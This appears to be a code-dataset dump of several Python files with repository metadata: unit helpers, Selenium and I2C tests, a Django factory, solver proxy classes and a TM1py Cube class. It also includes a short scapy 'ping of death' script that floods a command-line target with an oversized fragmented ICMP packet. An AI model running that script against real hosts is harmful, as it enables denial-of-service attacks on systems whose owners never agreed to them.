print(extract_events()) | 20.444444 | 46 | 0.817935 | 54 | 368 | 5.462963 | 0.555556 | 0.101695 | 0.115254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006173 | 0.119565 | 368 | 18 | 47 | 20.444444 | 0.904321 | 0 | 0 | 0 | 0 | 0 | 0.02981 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.769231 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f457876bcb504db6e05538c1c2f3c9dbedca451a | 329 | py | Python | pyleecan/Methods/GUI_Option/Unit/get_m2_name.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 95 | 2019-01-23T04:19:45.000Z | 2022-03-17T18:22:10.000Z | pyleecan/Methods/GUI_Option/Unit/get_m2_name.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 366 | 2019-02-20T07:15:08.000Z | 2022-03-31T13:37:23.000Z | pyleecan/Methods/GUI_Option/Unit/get_m2_name.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 74 | 2019-01-24T01:47:31.000Z | 2022-02-25T05:44:42.000Z | # -*- coding: utf-8 -*-
def get_m2_name(self):
"""Return the name of the current area unit
Parameters
----------
self : Unit
A Unit object
Returns
-------
unit_name : str
Name of the current unit
"""
if self.unit_m2 == 1:
return "mm²"
else:
return "m²"
| 15.666667 | 47 | 0.49848 | 41 | 329 | 3.902439 | 0.560976 | 0.075 | 0.1125 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.361702 | 329 | 20 | 48 | 16.45 | 0.733333 | 0.541033 | 0 | 0 | 0 | 0 | 0.046296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f45baf3825f92a2e4457b7e9b5e290dac00f780d | 1,370 | py | Python | Web-App/qa327_test/frontend/test_R7_logout.py | sgravel129/SeetGeeks | 38d216741951868299bee402a372660ad554a24e | [
"MIT"
] | null | null | null | Web-App/qa327_test/frontend/test_R7_logout.py | sgravel129/SeetGeeks | 38d216741951868299bee402a372660ad554a24e | [
"MIT"
] | null | null | null | Web-App/qa327_test/frontend/test_R7_logout.py | sgravel129/SeetGeeks | 38d216741951868299bee402a372660ad554a24e | [
"MIT"
] | null | null | null | import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password='test_frontend'
)
class FrontEndLogoutTest(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
def test_login_success(self, *_):
# remove any current sessions
self.open(base_url + '/logout')
# create a session
self.open(base_url + '/login')
self.type("#email", test_user.email)
self.type("#password", test_user.password)
self.click('input[type="submit"]')
# logout of session
self.open(base_url + '/logout')
# verify that we have closed session/logged out
# open root url, this should redirect to login
self.open(base_url + '/')
self.assert_text("Please login", "#message")
# open root buy page, this should redirect to login
self.open(base_url + '/buy')
self.assert_text("Please login", "#message")
# open root sell page, this should redirect to login
self.open(base_url + '/sell')
self.assert_text("Please login", "#message")
# open root update page, this should redirect to login
self.open(base_url + '/update')
self.assert_text("Please login", "#message")
| 26.346154 | 73 | 0.731387 | 197 | 1,370 | 4.939086 | 0.360406 | 0.057554 | 0.086331 | 0.107914 | 0.405961 | 0.332991 | 0.300103 | 0.300103 | 0.176773 | 0.135663 | 0 | 0.007719 | 0.148905 | 1,370 | 51 | 74 | 26.862745 | 0.826758 | 0.237956 | 0 | 0.214286 | 1 | 0 | 0.215534 | 0.042718 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.035714 | false | 0.107143 | 0.214286 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f462c49130537a9d0e3cb05ac39fbb6607b6b15d | 7,575 | py | Python | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 3 | 2017-09-13T14:54:01.000Z | 2020-02-13T05:34:23.000Z | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 1 | 2017-04-02T04:10:10.000Z | 2017-04-04T03:54:49.000Z | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 2 | 2019-07-08T15:53:28.000Z | 2020-10-13T04:32:17.000Z | import unittest
from mock import MagicMock
from py_i2c_register.register_list import RegisterList
from py_i2c_register.register import Register
from py_i2c_register.register_segment import RegisterSegment
class TestRegisterListInit(unittest.TestCase):
def test_perfect(self):
i2c = MagicMock()
list = RegisterList(1, i2c, {"key": "value"})
self.assertEqual(list.dev_addr, 1)
self.assertEqual(list.i2c, i2c)
self.assertEqual(list.registers, {"key": "value"})
class TestRegisterListProxyMethods(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.i2c.readBytes = MagicMock(return_value=[170])
self.i2c.writeBytes = MagicMock()
self.lst = RegisterList(1, self.i2c, {})
self.lst.add("REG1", 1, Register.READ + Register.WRITE, {})
self.lst.get("REG1").add("SEG1", 0, 2, [0] * 3)
def test_to_int_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_int = MagicMock()
self.lst.to_int("REG1", "SEG1", read_first=True)
self.lst.get("REG1").get("SEG1").bytes_to_int.assert_called_once()
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
def test_to_int_dont_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_int = MagicMock()
self.lst.to_int("REG1", "SEG1", read_first=False)
self.lst.get("REG1").get("SEG1").bytes_to_int.assert_called_once()
self.i2c.readBytes.assert_not_called()
def test_to_int_keyerror_reg(self):
with self.assertRaises(KeyError):
self.lst.to_int("DOES_NOT_EXIST", "SEG1")
def test_to_int_keyerror_seg(self):
with self.assertRaises(KeyError):
self.lst.to_int("REG1", "DOES_NOT_EXIST")
def test_to_twos_comp_int_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int = MagicMock()
self.lst.to_twos_comp_int("REG1", "SEG1", read_first=True)
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int.assert_called_once()
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
def test_to_twos_comp_int_dont_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int = MagicMock()
self.lst.to_twos_comp_int("REG1", "SEG1", read_first=False)
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int.assert_called_once()
self.i2c.readBytes.assert_not_called()
def test_to_twos_comp_int_keyerror_reg(self):
with self.assertRaises(KeyError):
self.lst.to_twos_comp_int("DOES_NOT_EXIST", "SEG1")
def test_to_twos_comp_int_keyerror_seg(self):
with self.assertRaises(KeyError):
self.lst.to_twos_comp_int("REG1", "DOES_NOT_EXIST")
def test_set_bits_perfect_write_after(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=True)
seg1.set_bits.assert_called_once_with([1, 1, 0])
self.i2c.writeBytes.assert_called_once_with(1, 1, [3])
def test_set_bits_perfect_dont_write_after(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=False)
seg1.set_bits.assert_called_once_with([1, 1, 0])
self.i2c.writeBytes.assert_not_called()
def test_set_bits_perfect_write_after_custom_write_fn(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
mock_write = MagicMock()
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=True, write_fn=mock_write)
seg1.set_bits.assert_called_once_with([1, 1, 0])
mock_write.assert_called_once_with("REG1")
def test_set_bits_perfect_dont_write_after_custom_write_fn(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
mock_write = MagicMock()
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=False, write_fn=mock_write)
seg1.set_bits.assert_called_once_with([1, 1, 0])
mock_write.assert_not_called()
def test_set_bits_from_int(self):
self.lst.set_bits = MagicMock()
mock_write = MagicMock()
self.lst.set_bits_from_int("REG1", "SEG1", 3, write_after=True, write_fn=mock_write)
self.lst.set_bits.assert_called_once_with("REG1", "SEG1", [1, 1, 0], write_after=True, write_fn=mock_write)
def test_read(self):
reg1 = self.lst.get("REG1")
reg1.read = MagicMock(side_effect=reg1.read)
self.lst.read("REG1")
reg1.read.assert_called_once_with(self.i2c)
self.assertEqual(self.lst.to_int("REG1", "SEG1"), 2)
def test_write(self):
reg1 = self.lst.get("REG1")
reg1.write = MagicMock(side_effect=reg1.write)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0])
self.lst.write("REG1")
reg1.write.assert_called_once_with(self.i2c)
self.i2c.writeBytes.assert_called_once_with(1, 1, [3])
class TestRegisterListAdd(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.lst = RegisterList(1, self.i2c, {})
def test_add_perfect(self):
self.lst.add("REG1", 1, "OP_MODE", {"key": "value"})
reg = self.lst.get("REG1")
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, "OP_MODE")
self.assertEquals(reg.segments, {"key": "value"})
def test_add_already_exists(self):
self.lst.add("REG1", 1, Register.READ, {})
with self.assertRaises(KeyError):
self.lst.add("REG1", 1, Register.READ, {})
class TestRegisterListGet(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.i2c.readBytes = MagicMock(return_value=[213])
self.lst = RegisterList(1, self.i2c, {})
self.seg1 = RegisterSegment("SEG1", 0, 2, [0] * 3)
self.lst.add("REG1", 1, Register.READ, {"SEG1": self.seg1})
def test_perfect_read_first(self):
reg = self.lst.get("REG1", read_first=True)
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, Register.READ)
self.assertEquals(reg.segments["SEG1"], self.seg1)
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
self.assertEqual(self.lst.get("REG1").get("SEG1").bits, [1, 0, 1])
def test_perfect_dont_read_first(self):
reg = self.lst.get("REG1", read_first=False)
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, Register.READ)
self.assertEqual(reg.segments["SEG1"], self.seg1)
self.i2c.readBytes.assert_not_called()
self.assertEqual(self.lst.get("REG1").get("SEG1").bits, [0, 0, 0])
def test_keyerror(self):
with self.assertRaises(KeyError):
self.lst.get("DOES_NOT_EXIST")
class TestRegisterListGenericMethods(unittest.TestCase):
def test_str(self):
i2c = MagicMock()
lst = RegisterList(1, i2c, {})
lst.add("REG1", 1, Register.READ, {})\
.add("SEG1", 0, 2, [0] * 3)
self.assertEqual(str(lst), "RegisterList<device_address=1, registers={\n REG1=Register<name=REG1, address=1, op_mode=READ, segments={\n SEG1=RegisterSegment<name=SEG1, lsb_i=0, msb_i=2, bits=[0, 0, 0]>\n }>\n}>")
| 37.132353 | 233 | 0.656238 | 1,083 | 7,575 | 4.336103 | 0.080332 | 0.07155 | 0.044719 | 0.059625 | 0.774276 | 0.742334 | 0.703578 | 0.589012 | 0.567717 | 0.519378 | 0 | 0.038436 | 0.196304 | 7,575 | 203 | 234 | 37.315271 | 0.732917 | 0 | 0 | 0.416667 | 0 | 0.006944 | 0.0833 | 0.011221 | 0 | 0 | 0 | 0 | 0.326389 | 1 | 0.173611 | false | 0 | 0.034722 | 0 | 0.243056 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f46c75e02a21885e59602dfbe2b52ec915b45dcb | 324 | py | Python | kollect/factories/user.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | 18 | 2019-09-24T23:49:41.000Z | 2020-11-14T17:30:27.000Z | kollect/factories/user.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | 53 | 2019-09-24T18:50:25.000Z | 2022-02-27T11:44:55.000Z | tabletop/factories/user.py | dcramer/tabletop-server | 062f56d149a29d5ab8605e220c156c1b4fb52d2f | [
"Apache-2.0"
] | 2 | 2020-02-03T08:22:36.000Z | 2021-02-28T12:55:48.000Z | import factory
from .. import models
class UserFactory(factory.django.DjangoModelFactory):
name = factory.Faker("name")
email = factory.LazyAttribute(
lambda x: "{0}@example.com".format(x.name.replace(" ", ".").lower()).lower()
)
password = "password"
class Meta:
model = models.User
| 21.6 | 84 | 0.638889 | 35 | 324 | 5.914286 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003906 | 0.209877 | 324 | 14 | 85 | 23.142857 | 0.804688 | 0 | 0 | 0 | 0 | 0 | 0.089506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
f478930ba2e20cec94a71da79e66de67fb18298f | 10,768 | py | Python | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | 8 | 2021-07-07T16:34:54.000Z | 2022-02-15T15:28:39.000Z | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | null | null | null | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | null | null | null | import operator
import typing
import z3
from .._exceptions import UnsupportedError
from ._methods import Methods
from ._type_factory import TypeFactory
if typing.TYPE_CHECKING:
from .._context import Context
from ._bool import BoolSort
from ._float import FloatSort, FPSort, RealSort
from ._int import IntSort
from ._str import StrSort
T = typing.TypeVar('T', bound='ProxySort')
class ProxySort:
module_name: str = 'builtins'
type_name: str
expr: z3.ExprRef
methods: 'Methods' = Methods()
@staticmethod
def make_empty_expr(sort):
raise NotImplementedError
def sort(self) -> z3.SortRef:
return self.expr.sort()
def __init__(self, expr) -> None:
raise NotImplementedError
@property
def factory(self) -> TypeFactory:
raise NotImplementedError
@classmethod
def var(cls, *, name: str, ctx: z3.Context) -> 'ProxySort':
raise NotImplementedError
@property
def is_real(self) -> bool:
return False
@property
def is_fp(self) -> bool:
return False
@methods.add(name='__getattr__')
def m_getattr(self, name: str, ctx: 'Context') -> 'ProxySort':
"""self.name
"""
method = self.methods.get(name)
if method is None:
msg = "'{}' object has no attribute '{}'"
msg = msg.format(self.type_name, name)
ctx.add_exception(AttributeError, msg)
return self
result = method.with_obj(self)
if result.prop:
return result.m_call(ctx=ctx)
return result
@methods.add(name='__bool__')
def m_bool(self, ctx: 'Context') -> 'BoolSort':
"""bool(self)
"""
from ._registry import types
return types.bool.val(True, ctx=ctx)
@methods.add(name='__abs__')
def m_abs(self, ctx: 'Context') -> 'ProxySort':
"""abs(self)
"""
msg = "bad operand type for abs(): '{}'".format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__int__')
def m_int(self, ctx: 'Context') -> 'IntSort':
"""int(self)
"""
raise UnsupportedError('cannot convert {} to int'.format(self.type_name))
@methods.add(name='__str__')
def m_str(self, ctx: 'Context') -> 'StrSort':
"""str(self)
"""
raise UnsupportedError('cannot convert {} to str'.format(self.type_name))
@methods.add(name='__float__')
def m_float(self, ctx: 'Context') -> 'FloatSort':
"""float(self)
"""
raise UnsupportedError('cannot convert {} to float'.format(self.type_name))
def m_real(self, ctx: 'Context') -> 'RealSort':
raise NotImplementedError
def m_fp(self, ctx: 'Context') -> 'FPSort':
raise NotImplementedError
@methods.add(name='__call__')
def m_call(self, *args, ctx: 'Context', **kwargs) -> 'ProxySort':
"""self(*args, **kwargs)
"""
msg = "'{}' object is not callable".format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__len__')
def m_len(self, ctx: 'Context') -> 'IntSort':
"""len(self)
"""
from ._registry import types
msg = "object of type '{}' has no len()".format(self.type_name)
ctx.add_exception(TypeError, msg)
return types.int.val(0, ctx=ctx)
@methods.add(name='__getitem__')
def m_getitem(self, item: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self[item]
"""
msg = "'{}' object is not subscriptable"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
def get_slice(self, start, stop, ctx: 'Context') -> 'ProxySort':
"""self[start:stop]
"""
msg = "'{}' object is not subscriptable"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__setitem__')
def m_setitem(self, key: 'ProxySort', value: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self[key] = value
"""
msg = "'{}' object does not support item assignment"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__contains__')
def m_contains(self, item, ctx: 'Context') -> 'BoolSort':
"""item in self
"""
from ._registry import types
msg = "argument of type '{}' is not iterable".format(self.type_name)
ctx.add_exception(TypeError, msg)
return types.bool.val(False, ctx=ctx)
def _binary_op(self, other: 'ProxySort', handler: typing.Callable, ctx: 'Context'):
return handler(self.expr, other.expr)
# comparison
def _comp_op(self, other: 'ProxySort', handler: typing.Callable, ctx: 'Context') -> 'BoolSort':
from ._bool import BoolSort
expr = self._binary_op(other=other, handler=handler, ctx=ctx)
return BoolSort(expr=expr)
@methods.add(name='__eq__')
def m_eq(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self == other
"""
return self._comp_op(other=other, handler=operator.__eq__, ctx=ctx)
@methods.add(name='__ne__')
def m_ne(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self != other
"""
from ._bool import BoolSort
expr = self.m_eq(other, ctx=ctx).expr
return BoolSort(expr=z3.Not(expr))
@methods.add(name='__lt__')
def m_lt(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self < other
"""
return self._comp_op(other=other, handler=operator.__lt__, ctx=ctx)
@methods.add(name='__le__')
def m_le(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self <= other
"""
return self._comp_op(other=other, handler=operator.__le__, ctx=ctx)
@methods.add(name='__gt__')
def m_gt(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self > other
"""
return self._comp_op(other=other, handler=operator.__gt__, ctx=ctx)
@methods.add(name='__ge__')
def m_ge(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self >= other
"""
return self._comp_op(other=other, handler=operator.__ge__, ctx=ctx)
@methods.add(name='in')
def m_in(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self in other
"""
return other.m_contains(self, ctx=ctx)
@methods.add(name='not in')
def m_not_in(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self in other
"""
return other.m_contains(self, ctx=ctx).m_not(ctx=ctx)
# unary operations
@methods.add(name='__neg__')
def m_neg(self, ctx: 'Context') -> 'ProxySort':
"""-self
"""
cls = type(self)
return cls(expr=-self.expr)
@methods.add(name='__pos__')
def m_pos(self, ctx: 'Context') -> 'ProxySort':
"""+self
"""
cls = type(self)
return cls(expr=+self.expr)
@methods.add(name='__inv__')
def m_inv(self, ctx: 'Context') -> 'ProxySort':
"""~self
"""
return self._bad_un_op(op='~', ctx=ctx)
@methods.add(name='not')
def m_not(self, ctx: 'Context') -> 'BoolSort':
"""not self
"""
from ._bool import BoolSort
expr = self.m_bool(ctx=ctx).expr
return BoolSort(expr=z3.Not(expr, ctx=ctx.z3_ctx))
# math binary operations
@methods.add(name='__add__')
def m_add(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self + other
"""
return self._bad_bin_op(other, op='+', ctx=ctx)
@methods.add(name='__sub__')
def m_sub(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self - other
"""
return self._bad_bin_op(other, op='-', ctx=ctx)
@methods.add(name='__mul__')
def m_mul(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self * other
"""
return self._bad_bin_op(other, op='*', ctx=ctx)
@methods.add(name='__truediv__')
def m_truediv(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self / other
"""
return self._bad_bin_op(other, op='/', ctx=ctx)
@methods.add(name='__floordiv__')
def m_floordiv(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self // other
"""
return self._bad_bin_op(other, op='//', ctx=ctx)
@methods.add(name='__mod__')
def m_mod(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self % other
"""
return self._bad_bin_op(other, op='%', ctx=ctx)
@methods.add(name='__pow__')
def m_pow(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self ** other
"""
return self._bad_bin_op(other, op='** or pow()', ctx=ctx)
@methods.add(name='__matmul__')
def m_matmul(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self @ other
"""
return self._bad_bin_op(other, op='@', ctx=ctx)
# bitwise binary operations
@methods.add(name='__and__')
def m_and(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self & other
"""
return self._bad_bin_op(other, op='&', ctx=ctx)
@methods.add(name='__or__')
def m_or(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self | other
"""
return self._bad_bin_op(other, op='|', ctx=ctx)
@methods.add(name='__xor__')
def m_xor(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self ^ other
"""
return self._bad_bin_op(other, op='^', ctx=ctx)
@methods.add(name='__lshift__')
def m_lshift(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self << other
"""
return self._bad_bin_op(other, op='<<', ctx=ctx)
@methods.add(name='__rshift__')
def m_rshift(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self >> other
"""
return self._bad_bin_op(other, op='>>', ctx=ctx)
# helpers for error messages in operations
def _bad_bin_op(self: T, other: 'ProxySort', op: str, ctx: 'Context') -> T:
msg = "unsupported operand type(s) for {}: '{}' and '{}'"
msg = msg.format(op, self.type_name, other.type_name)
ctx.add_exception(TypeError, msg)
return self
def _bad_un_op(self: T, op: str, ctx: 'Context') -> T:
msg = "bad operand type for unary {}: '{}'"
msg = msg.format(op, self.type_name)
ctx.add_exception(TypeError, msg)
return self
| 31.211594 | 99 | 0.580052 | 1,298 | 10,768 | 4.570108 | 0.112481 | 0.072488 | 0.084963 | 0.084963 | 0.594235 | 0.531018 | 0.478085 | 0.450101 | 0.442515 | 0.412846 | 0 | 0.001003 | 0.258915 | 10,768 | 344 | 100 | 31.302326 | 0.742356 | 0.084974 | 0 | 0.207921 | 0 | 0 | 0.165477 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247525 | false | 0 | 0.084158 | 0.019802 | 0.569307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f47b5737d51a0d7bdf070b88821dfed1bad5daac | 261 | py | Python | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 4 | 2020-05-22T13:31:15.000Z | 2020-11-11T22:05:45.000Z | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 1 | 2020-05-20T13:48:56.000Z | 2020-05-20T15:15:03.000Z | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 2 | 2020-05-20T07:28:53.000Z | 2020-05-22T13:15:30.000Z | from scapy.all import *
import sys
## Ping of death
def ping_of_death_attack():
host = sys.argv[1]
# https://en.wikipedia.org/wiki/Ping_of_death
send(fragment(IP(dst=host)/ICMP()/("X"*60000)))
if __name__ == "__main__":
ping_of_death_attack()
| 21.75 | 51 | 0.681992 | 41 | 261 | 3.95122 | 0.682927 | 0.148148 | 0.271605 | 0.209877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027273 | 0.157088 | 261 | 11 | 52 | 23.727273 | 0.709091 | 0.218391 | 0 | 0 | 0 | 0 | 0.045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f48ad35edada7568ab5f4faec72105a6494d35f0 | 2,819 | py | Python | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 19 | 2016-03-04T19:21:40.000Z | 2021-12-10T02:39:51.000Z | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 11 | 2016-08-24T19:27:11.000Z | 2017-07-30T01:10:28.000Z | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 6 | 2016-08-03T19:28:45.000Z | 2017-01-30T12:25:05.000Z | # -*- coding: utf-8 -*-
import collections
import json
from TM1py.Objects.Rules import Rules
from TM1py.Objects.TM1Object import TM1Object
class Cube(TM1Object):
""" Abstraction of a TM1 Cube
"""
def __init__(self, name, dimensions, rules=None):
"""
:param name: name of the Cube
:param dimensions: list of (existing) dimension names
:param rules: instance of TM1py.Objects.Rules
"""
self._name = name
self._dimensions = dimensions
self._rules = rules
@property
def name(self):
return self._name
@property
def dimensions(self):
return self._dimensions
@dimensions.setter
def dimensions(self, value):
self._dimensions = value
@property
def has_rules(self):
if self._rules:
return True
return False
@property
def rules(self):
return self._rules
@rules.setter
def rules(self, value):
self._rules = value
@property
def skipcheck(self):
if self.has_rules:
return self.rules.skipcheck
return False
@property
def undefvals(self):
if self.has_rules:
return self.rules.undefvals
return False
@property
def feedstrings(self):
if self.has_rules:
return self.rules.feedstrings
return False
@classmethod
def from_json(cls, cube_as_json):
""" Alternative constructor
:param cube_as_json: user as JSON string
:return: cube, an instance of this class
"""
cube_as_dict = json.loads(cube_as_json)
return cls.from_dict(cube_as_dict)
@classmethod
def from_dict(cls, cube_as_dict):
""" Alternative constructor
:param cube_as_dict: user as dict
:return: user, an instance of this class
"""
return cls(name=cube_as_dict['Name'],
dimensions=[dimension['Name'] for dimension in cube_as_dict['Dimensions']],
rules=Rules(cube_as_dict['Rules']) if cube_as_dict['Rules'] else None)
@property
def body(self):
return self._construct_body()
def _construct_body(self):
"""
construct body (json) from the class attributes
:return: String, TM1 JSON representation of a cube
"""
body_as_dict = collections.OrderedDict()
body_as_dict['Name'] = self.name
body_as_dict['Dimensions@odata.bind'] = ['Dimensions(\'{}\')'.format(dimension)
for dimension
in self.dimensions]
if self.rules:
body_as_dict['Rules'] = str(self.rules)
return json.dumps(body_as_dict, ensure_ascii=False)
